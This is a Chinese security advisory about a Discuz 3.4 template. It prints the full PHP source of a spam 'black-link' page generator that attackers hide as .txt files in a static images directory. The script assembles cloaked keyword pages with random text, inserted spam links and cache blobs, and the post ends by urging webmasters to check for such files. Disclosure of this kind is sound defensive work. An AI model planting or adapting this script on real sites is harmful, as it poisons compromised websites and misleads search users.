|
|
Discuz 3.4某APP模板漏洞利用报告:黑链随机关键字随机文章内容缓存注入脚本:
引入位置:
/static/space/t2/images/ 目录下的 *.txt 文件(引用/转换文件)
- <?php // Entry script of the keyword/article page generator described in the post. NOTE(review): the leading "- " on every line looks like list markup from the forum listing, not part of the PHP.
- @error_reporting(E_ERROR); // reporting is limited to fatal errors, so notices and warnings raised below are not reported
- @date_default_timezone_set("Etc/GMT-8"); // POSIX-style zone name: Etc/GMT-8 is UTC+8
- @ini_set('memory_limit', '2048M'); // requests a 2048M memory limit
- $app_Jack_Tpl = new app_Jack_Tpl();
- $app_Jack_Tpl->loadTpl(); // reads APP_JACK_TEMPLATE and die()s when that file is missing
- $app_Jack_kwd = file(APP_JACK_KEYWORD); // keyword list as an array of lines; the APP_JACK_* constants are defined outside this listing
- $app_Jack_atl = file(APP_JACK_ARTICLE); // article text as an array of lines
- $app_Jack_core = new app_Jack_Core($app_Jack_kwd,$app_Jack_atl);
- $app_Jack_core->run(); // generate every placeholder value
- $app_Jack_var = $app_Jack_core->getStore();
- if(APP_JACK_CACHED=="cached"){ // cache mode: hand back the generated values instead of a rendered page
- return "<explode>".app_Jack_Cache::encode($app_Jack_var)."</explode>"; // file-level return: when this file is include()d the value goes to the including script; payload is base64(gzcompress(serialize(...))) wrapped in <explode> tags
- exit(); // unreachable, the return above has already left the file
- }
- $app_Jack_Tpl->extra($app_Jack_var); // substitute each {key} placeholder in the loaded template
- return $app_Jack_Tpl->show(); // the filled-in page is returned to the includer, not echoed here
- class app_Jack_Tpl{ // Holds the page template text and fills its {placeholder} markers.
- public $page; // template text, later the rendered page
- public $domain; // never read or written in this listing
- public function loadTpl(){ // Loads the template file named by APP_JACK_TEMPLATE into $this->page.
- if(file_exists(APP_JACK_TEMPLATE)){
- $this->page = file_get_contents(APP_JACK_TEMPLATE);
- }
- else
- {
- die(); // no template: stop silently, nothing is output
- }
- }
- public function extra($var){ // Replaces every "{key}" in the page with the matching value from $var (key => value array).
- if(!$this->page){
- die(""); // empty or unloaded template: stop with no output
- }
- foreach($var as $k=>$v){
- $this->page = str_replace("{".$k."}",$v,$this->page); // values are inserted as-is, no escaping is applied
- }
- $this->page = str_replace("{domain}","",$this->page); // any {domain} marker is blanked out
- }
- public function show(){ // Returns the current page text.
- return $this->page;
- }
- }
- class app_Jack_Core{ // Builds the placeholder-to-value map ("store") that app_Jack_Tpl::extra() substitutes into the template.
- public $kwd = ""; // keyword array (assigned by the constructor)
- public $atl = ""; // article array. NOTE(review): the original comment carried residue that looks like a lost "public $kwdCount = 0;" declaration; as listed, kwdCount is only created in the constructor
- public $atlCount = 0;
- public $config = array();
- public $store = array();
- public $linkstyle = "";
- // original note: "of which $domain_config" (no such variable appears in this listing)
- function __construct($kwd,$atl){ // Stores the keyword and article line arrays and their highest indexes.
- $this->kwd = $kwd;
- $this->atl = $atl;
- //
- $this->kwdCount = count($kwd)-1; // highest valid keyword index
- $this->atlCount = count($atl)-1; // highest valid article index
- //
- }
- public function run(){ // Fills $this->store; the Chinese keys double as the {placeholder} names replaced in the template.
- $id = mt_rand(0,$this->kwdCount); // pick the main keyword at random
- $this->store['标题'] = trim($this->kwd[$id]); // "title"
- $this->store['非空格标题'] = str_replace(" ","",trim($this->kwd[$id])); // "title without spaces"
- // add the neighbouring (next/previous) keywords
- if($id==$this->kwdCount){
- $nextId = $id-2;
- }
- else
- {
- $nextId = $id+1;
- }
- $this->store['下关键字'] = trim($this->kwd[$nextId]); // "next keyword"; overwritten further down
- $this->store['上关键字'] = trim($this->kwd[$id-1]); // "previous keyword"; the index is -1 when $id is 0; overwritten further down
- // random picks
- for($a=0;$a<=20;$a++){
- $this->store['随机关键字'.$a] = trim($this->kwd[mt_rand(0,$this->kwdCount)]); // "random keyword N"
- }
- // random article lines
- for($a=0;$a<=20;$a++){
- $this->store['随机段落'.$a] = trim($this->atl[mt_rand(0,$this->atlCount)]); // "random paragraph N"
- }
- for($a=0;$a<=10;$a++){
- $this->store['随机图片'.$a] = getImg(); // "random image N"; getImg() is not defined in this listing
- }
- $this->store['系统图片'] =getImg(); // "system image"
- $tempArray = array();
- // within a range of 60 around the chosen keyword
- for($a=0;$a<30;$a++){
- $akid = $id+$a;
- if($akid>=$this->kwdCount){
- $akid = abs($this->kwdCount-$akid); // past the end: fold the overshoot back to a low index
- }
- $tempArray[] = $akid;
- $akid = abs($id-$a);
- $tempArray[] = $akid;
- }
- array_unique($tempArray); // return value is discarded, so duplicates stay in $tempArray
- shuffle($tempArray);
- for($a=0;$a<=10;$a++){
- $this->store['相关关键字'.$a] = trim($this->kwd[$tempArray[$a]]); // "related keyword N"
- $this->store['相关关键字链接'.$a] = App_GetLink(); // "related keyword link N"; App_GetLink() is not defined in this listing
- }
- //
- $this->store['下关键字'] = $this->store['随机关键字1']; // replaces the neighbour-based value set earlier
- $this->store['上关键字'] = $this->store['随机关键字2']; // replaces the neighbour-based value set earlier
- // fix-up
- $this->store['下关键字链接'] = App_GetLink(); // "next keyword link"
- $this->store['上关键字链接'] = App_GetLink(); // "previous keyword link"
- for($a=0;$a<=30;$a++){
- $this->store['随机关键字'.$a] = trim($this->kwd[mt_rand(0,$this->kwdCount)]); // regenerates "random keyword" 0..20 and extends the range to 30
- }
- // random links
- for($a=0;$a<=30;$a++){
- $this->store['随机链接'.$a] = App_GetLink(); // "random link N"
- }
- $this->store['随机链接'.$a] = App_GetLink(); // $a is 31 after the loop, so this adds one more entry, "random link31"
- for($a=1;$a<=15;$a++){
- $senDB = trim($this->atl[mt_rand(1,$this->atlCount)]).trim($this->atl[mt_rand(1,$this->atlCount)]); // two random article lines joined (line 0 is never picked here)
- $this->store['随机句子'.$a] = self::getSentence(trim($senDB),6,12); // "random sentence N": a 6..12 character slice
- }
- $this->store['混合标题'] = ""; // "mixed title"
- if(file_exists(APP_MIX_KWD_FILE)){
- $midKwd= file(APP_MIX_KWD_FILE);
- $getMidKwd = $midKwd[mt_rand(1,count($midKwd)-1)]; // random line, line 0 excluded
- $getMidKwd = App_Jack_article_auto::insert_tags($getMidKwd,1); // drop one {tag} marker at a random position
- $getMidKwd = str_replace("{tag}",$this->store['标题'],$getMidKwd); // then put the title where the marker landed
- $this->store['混合标题'] = trim($getMidKwd);
- }
- if(file_exists(APP_JACK_DES)){
- $manDes = file(APP_JACK_DES);
- $manDesContent = trim($manDes[mt_rand(0,count($manDes)-1)]);
- $manDesContent = str_replace("{subtitle}",$this->store['标题'],$manDesContent);
- $manDesContent = str_replace("{标题}",$this->store['标题'],$manDesContent);
- $manDesContent = str_replace("{混合标题}",$this->store['标题'],$manDesContent); // the mixed-title marker is filled with the plain title here
- $this->store['手动描述'] = trim($manDesContent); // "manual description"
- }
- if(file_exists(APP_JACK_BIANLIANG)){ // optional variable file ("bianliang" is pinyin for "variable")
- $randVar = file(APP_JACK_BIANLIANG);
- $countRandVar = count($randVar)-1;
- for($a=1;$a<=10;$a++){
- $tmpVar = $randVar[mt_rand(0,$countRandVar)]; // random line from the variable file
- $tmpVar = str_replace("{标题}",$this->store['标题'],$tmpVar);
- $tmpVar = str_replace("{混合标题}",$this->store['混合标题'],$tmpVar);
- $senDB = trim($this->atl[mt_rand(1,$this->atlCount)]).trim($this->atl[mt_rand(1,$this->atlCount)]);
- $sen = self::getSentence(trim($senDB),6,12);
- $tmpVar = str_replace("{随机句子}",$sen,$tmpVar);
- $this->store['随机变量'.$a] = trim($tmpVar); // "random variable N"
- }
- }
- if(file_exists(APP_JACK_BIANLIANG_B)){ // same steps as above for a second variable file
- $randVar = file(APP_JACK_BIANLIANG_B);
- $countRandVar = count($randVar)-1;
- for($a=1;$a<=10;$a++){
- $tmpVar = $randVar[mt_rand(0,$countRandVar)];
- $tmpVar = str_replace("{标题}",$this->store['标题'],$tmpVar);
- $tmpVar = str_replace("{混合标题}",$this->store['混合标题'],$tmpVar);
- $senDB = trim($this->atl[mt_rand(1,$this->atlCount)]).trim($this->atl[mt_rand(1,$this->atlCount)]);
- $sen = self::getSentence(trim($senDB),6,12);
- $tmpVar = str_replace("{随机句子}",$sen,$tmpVar);
- $this->store['随机变量B'.$a] = trim($tmpVar); // "random variable B N"
- }
- }
- if(file_exists(APP_JACK_BIANLIANG_C)){ // same steps again for a third variable file
- $randVar = file(APP_JACK_BIANLIANG_C);
- $countRandVar = count($randVar)-1;
- for($a=1;$a<=10;$a++){
- $tmpVar = $randVar[mt_rand(0,$countRandVar)];
- $tmpVar = str_replace("{标题}",$this->store['标题'],$tmpVar);
- $tmpVar = str_replace("{混合标题}",$this->store['混合标题'],$tmpVar);
- $senDB = trim($this->atl[mt_rand(1,$this->atlCount)]).trim($this->atl[mt_rand(1,$this->atlCount)]);
- $sen = self::getSentence(trim($senDB),6,12);
- $tmpVar = str_replace("{随机句子}",$sen,$tmpVar);
- $this->store['随机变量C'.$a] = trim($tmpVar); // "random variable C N"
- }
- }
- for($ca=1;$ca<=10;$ca++){
- $this->store['随机数字'.$ca] = mt_rand(1,1000); // "random number N"
- }
- // random article (original label; the lines below set date and time values)
- $this->store['时间戳'] = date("Y-m-d"); // "timestamp": today's date
- $this->store['时间戳精准'] = date("Y-m-d H:i:s"); // "precise timestamp"
- $this->store['精准时间'] = date("Y-m-d H:i:s"); // "precise time"
- $this->store['倒数时间'] = date("Y-m-d H:i:s",mt_rand((time()-(1*24*3600)),time())); // "countdown time": a random moment within the last 24 hours
- $timeStampArray = array();
- for($a=0;$a<10;$a++){
- $timeStampArray[] = mt_rand((time()-(1*24*3600)),time()); // ten more random moments within the last 24 hours
- }
- sort($timeStampArray); // ascending, so "precise time 1..10" come out in chronological order
- for($a=1;$a<=10;$a++){
- $timeid = $a-1;
- $this->store['精准时间'.$a] = date("Y-m-d H:i:s",$timeStampArray[$timeid]);
- }
- $this->store['自身链接'] = App_GetSelf(); // "self link"; App_GetSelf() is not defined in this listing
- $this->store['中文时间戳'] = date("Y年m月d日"); // "Chinese timestamp"
- $this->store['中文精准时间'] = date("Y年m月d日 H点i分s秒"); // "Chinese precise time"
- $article_auto = new App_Jack_article_auto();
- $article_auto->init($this->atl,$this->atlCount);
- $article_copy = $article_auto->autoArticle(); // generated multi-paragraph text
- $this->store['系统文章2'] = $article_copy; // "system article 2"
- $this->store['系统描述2'] = $article_auto->getDes($this->store['标题'],$this->store['下关键字']); // "system description 2"
- $this->store['系统文章2'] = str_replace("{title}",$this->store['标题'],$this->store['系统文章2']);
- $this->store['系统文章2'] = str_replace("{backword}",$this->store['上关键字'],$this->store['系统文章2']);
- $this->store['系统文章2'] = str_replace("{nextword}",$this->store['下关键字'],$this->store['系统文章2']);
- $array = array(); // built here but not read again in the visible code
- $array[] = $this->store['标题'];
- $array[] = $this->store['下关键字'];
- $this->store['系统描述2'] = $article_auto->getDes($this->store['标题'],$this->store['下关键字']); // same call as a few lines above, computed a second time
- $this->store['系统描述2'] = str_replace("{title}",$this->store['标题'],$this->store['系统描述2']);
- $this->store['系统描述2'] = str_replace("{backword}",$this->store['上关键字'],$this->store['系统描述2']);
- $this->store['系统描述2'] = str_replace("{nextword}",$this->store['下关键字'],$this->store['系统描述2']);
-
- /// forum description tag
- $this->store['论坛描述'] = '{title}{rand1}{nexttitle}'; // "forum description" pattern
- $this->store['论坛描述'] = str_replace("{title}",$this->store['标题'],$this->store['论坛描述']);
- $this->store['论坛描述'] = str_replace("{rand1}",$this->store['随机段落1'],$this->store['论坛描述']);
- $this->store['论坛描述'] = str_replace("{nexttitle}",$this->store['上关键字'],$this->store['论坛描述']); // {nexttitle} is filled from the "previous keyword" entry
- }
- public function getSentence($str,$min,$max){ // Strips punctuation from $str and returns a random slice of $min..$max characters; strings shorter than $max are returned whole.
- $str = app_Jack_String::filter_mark($str);
- $strlen = app_Jack_String::abslength($str);
- $randId = rand(0,$strlen-10); // start offset, drawn before the length check below; the upper bound is negative for strings under 10 characters
- if($strlen < $max){
- return $str;
- }
- $newSen = app_Jack_String::substr($str, $randId, mt_rand($min,$max));
- if(app_Jack_String::strlen($str)==0){
- return $str;
- }
- return $newSen;
- }
- public function cut($file,$from,$end) // Returns what follows the first $from in $file, cut at the next $end; not called anywhere in this listing.
- {
- $message=explode($from,$file);
- $message=explode($end,$message[1]);
- return $message[0];
- }
- public function getStore(){ // Returns the generated placeholder map.
- return $this->store;
- }
- }
- class App_Jack_article_auto{ // Assembles pseudo-articles and descriptions out of randomly chosen article lines.
- public $title = "";
- public $nextTitle = "";
- public $backTitle = "";
- public $articleDb = ""; // article library (array of lines, set by init())
- public $articleCount = ""; // highest index into $articleDb, as passed by the caller
- public $des = "";
- public $content = ""; // first generated paragraph, kept for getDes()
- public function init($articleDb,$articleCount){ // Stores the article lines and their highest index.
- $this->articleDb = $articleDb;
- $this->articleCount = $articleCount;
- }
- public function autoArticle($min=3,$max=3){ // Returns generated text as <p> paragraphs with {title}/{backword}/{nextword} markers mixed in. $min and $max are never read.
- $article = $this->articleDb;
- $count = $this->articleCount;
- shuffle($article);
- $content = ""; // unused
- $norepeat = array(); // unused
- $returncontent = array();
- $maxPar = mt_rand(APP_JACK_MIN_PAR,APP_JACK_MAX_PAR); // number of paragraphs; constants defined outside this listing
- for($a=0;$a<$maxPar;$a++){
- $sence = rand(APP_JACK_MIN,APP_JACK_MAX); // number of lines glued into this paragraph
- // start combining sentences...
- $parContent = "";
- for($b=1;$b<$sence+1;$b++){
- $parContent .=trim($article[mt_rand(0,$count)]);
- }
- $returncontent[$a] = $parContent;
- }
- $returncontent[0] = self::insert_start($returncontent[0]); // one {tag} near the start of the first paragraph
- for($a=1;$a<$maxPar;$a++){
- $returncontent[$a] = self::insert_tags($returncontent[$a],2); // up to two {tag} markers in each later paragraph
- }
- // the first paragraph is passed in so keywords can be woven into it
- $replaceTag = array("{title}","{backword}","{nextword}");
- $returncontent[0] = str_replace("{tag}","{title},{nextword}",$returncontent[0]);
- $this->content = $returncontent[0];
- for($a=1;$a<$maxPar;$a++){
- $count = substr_count($returncontent[$a],"{tag}"); // $count is reused here: now the number of {tag} markers
- for($b=0;$b<$count+1;$b++){
- $returncontent[$a] = preg_replace("/{tag}/",$replaceTag[mt_rand(0,2)],$returncontent[$a],1); // swap one marker per pass for a random keyword marker
- }
- }
- $return = "";
- foreach($returncontent as $par){
- $return .="<p>".$par."</p>\n";
- }
- return $return;
- }
- public function getDes($title,$nexttitle){ // Returns the leading part of the first paragraph with {title} and {nextword} filled in.
- $this->content = str_replace("{title}",$title,$this->content);
- $this->content = str_replace("{nextword}",$nexttitle,$this->content);
- $length = mt_rand(50,80); // at least 20~30 characters to start with, plus the keyword lengths, so the description is sure to contain the keywords
- $length += app_Jack_String::strlen($title);
- $length += app_Jack_String::strlen($nexttitle);
- return app_Jack_String::substr($this->content,0,$length+8);
- }
- public function insert_start($str){ // Inserts one {tag} marker at a random character offset between 0 and 30.
- $times = 1; // how many times the keyword marker appears
- $keyword = "{tag}"; // marker that is replaced by a keyword later
- $strlen = app_Jack_String::strlen($str);
- for ( $i = 0; $i < $times; $i ++ )
- {
- $arr[] = mt_rand(0, 30);
- }
- $arr = array_unique($arr); // drop duplicate positions
- sort($arr);
- $i = 0;
- $str_new = "";
- foreach( $arr as $v )
- {
- $str_new .= app_Jack_String::substr($str, $i, $v - $i) . $keyword; // text up to the position, then the marker
- $i = $v;
- }
- $str_new .= app_Jack_String::substr($str, $i, $strlen - $i); // remainder of the string
- return $str_new;
- }
-
- public function insert_tags($str,$times){ // Inserts up to $times {tag} markers at random character offsets anywhere in $str.
- $keyword = "{tag}"; // marker that is replaced by a keyword later
- $strlen = app_Jack_String::strlen($str);
- for ( $i = 0; $i < $times; $i ++ )
- {
- $arr[] = mt_rand(0, $strlen);
- }
- $arr = array_unique($arr); // drop duplicate positions
- sort($arr);
- $i = 0;
- $str_new = "";
- foreach( $arr as $v )
- {
- $str_new .= app_Jack_String::substr($str, $i, $v - $i) . $keyword; // text up to the position, then the marker
- $i = $v;
- }
- $str_new .= app_Jack_String::substr($str, $i, $strlen - $i); // remainder of the string
- return $str_new;
- }
- }
- class app_Jack_Cache{ // Serializes the generated value map to and from an opaque text blob. Methods are declared non-static but called statically; PHP 8 rejects such calls.
- // write cache
- public function write($file,$filename){ // Encodes $file (any serializable value) and writes it to $filename.
- return file_put_contents($filename,self::encode($file));
- }
-
- public function read($filename){ // Reads $filename and decodes its content.
- $content = file_get_contents($filename);
- return self::decode($content);
- }
- public function encode($file){ // serialize, then zlib-compress, then base64; such blobs typically start with "eJ" (zlib header at the default compression level)
- return base64_encode(gzcompress(serialize($file)));
- }
- public function decode($file){ // NOTE(review): calls unserialize() on file content. When examining a captured blob, undo the base64 and zlib layers and read the serialized text instead of unserializing untrusted data.
- return unserialize(gzuncompress(base64_decode($file)));
- }
- }
- class app_Jack_String{ // Multi-byte string helpers (GBK or UTF-8, selected by APP_JACK_CHARSET, which is defined outside this listing).
- public function filter_mark($text){ // Removes the listed punctuation marks and all spaces from $text.
- $array = array(";",";","【","】",",","。","、","?","》","《","|",":","“","”","=","-","~","’",'‘',"!","!","-","(",")","(",")","*","&","……","^","$","@","#");
- if(trim($text)=='')return '';
- $text = str_replace($array,"",$text);
- $text = str_replace(" ","",$text);
- return trim($text);
- }
- // string slicing function
- public function substr($str, $start = 0, $length = 0) { // Character-based slice: skips $start characters, then takes $length characters. The $str{...} offset syntax below was removed in PHP 8.0, so the file as listed only parses on older runtimes.
- /* byte length of each non-ASCII character in this encoding */
- $encode = APP_JACK_CHARSET;
- $encode_len = $encode == 'UTF-8' ? 3 : 2; // every non-ASCII character is assumed to be 3 bytes in UTF-8, 2 otherwise
- for($byteStart = $i = 0; $i < $start; ++$i) {
- $byteStart += ord($str{$byteStart}) < 128 ? 1 : $encode_len; // advance by one character
- if( @$str{$byteStart} == '' ) return ''; // ran past the end of the string
- }
- for($i = 0, $byteLen = $byteStart; $i < $length; ++$i){
- @$byteLen += @ord($str{$byteLen}) < 128 ? 1 : $encode_len; // @ hides the out-of-range offset notices
- }
- return substr( $str, $byteStart, $byteLen-$byteStart ); // global byte-wise substr(), not this method
- }
- public function iconvStr($from,$to,$fContents) // Converts $fContents from charset $from to $to using mbstring, else iconv, else returns it unchanged; non-string input falls through and returns nothing.
- {
- if(is_string($fContents) )
- {
- if(function_exists('mb_convert_encoding'))
- {
- return mb_convert_encoding ($fContents, $to, $from);
- }
- else if(function_exists('iconv'))
- {
- return iconv($from,$to,$fContents);
- }
- else
- {
- return $fContents;
- }
- }
- }
- public function strlen($str){ // Length of $str, dispatching on APP_JACK_CHARSET.
- if(APP_JACK_CHARSET=="UTF-8"){
- return self::strlen_utf8($str);
- }
- else
- {
- return self::strlen_gbk($str);
- }
- }
- public function strlen_gbk($str){ // Walks the bytes, stepping 2 for a byte in 0xA1..0xFF and 1 otherwise, and returns the final offset divided by 2.
- $len=strlen($str);
- $i=0;
- while($i<$len)
- {
- if(preg_match("/^[".chr(0xa1)."-".chr(0xff)."]+$/",$str[$i]))
- {
- $i+=2;
- }
- else
- {
- $i+=1;
- }
- }
- return $i/2;
- }
- public function strlen_utf8($str) { // Counts UTF-8 characters by reading each lead byte and skipping its continuation bytes.
- $i = 0;
- $count = 0;
- $len = strlen ($str);
- while ($i < $len) {
- $chr = ord ($str[$i]);
- $count++;
- $i++;
- if($i >= $len) break;
- if($chr & 0x80) { // high bit set: multi-byte sequence
- $chr <<= 1;
- while ($chr & 0x80) { // one extra byte for each further leading 1 bit
- $i++;
- $chr <<= 1;
- }
- }
- }
- return $count;
- }
- public function abslength($str) // Character count of $str: mb_strlen() when available, otherwise the hand-written counters; 0 for empty input.
- {
- if(empty($str)){
- return 0;
- }
- if(function_exists('mb_strlen')){
- return mb_strlen($str,APP_JACK_CHARSET);
- }
- else {
- if(APP_JACK_CHARSET=="UTF-8"){
- return self::strlen_utf8($str);
- }else
- {
- return self::strlen_gbk($str);
- }
- return $b; // unreachable, and $b is never defined
- }
- }
- }
- ?>
该脚本可被引入并用于挂载黑链,请站长引起重视,检查上述目录下是否存在来历不明的 txt 文件。
|
|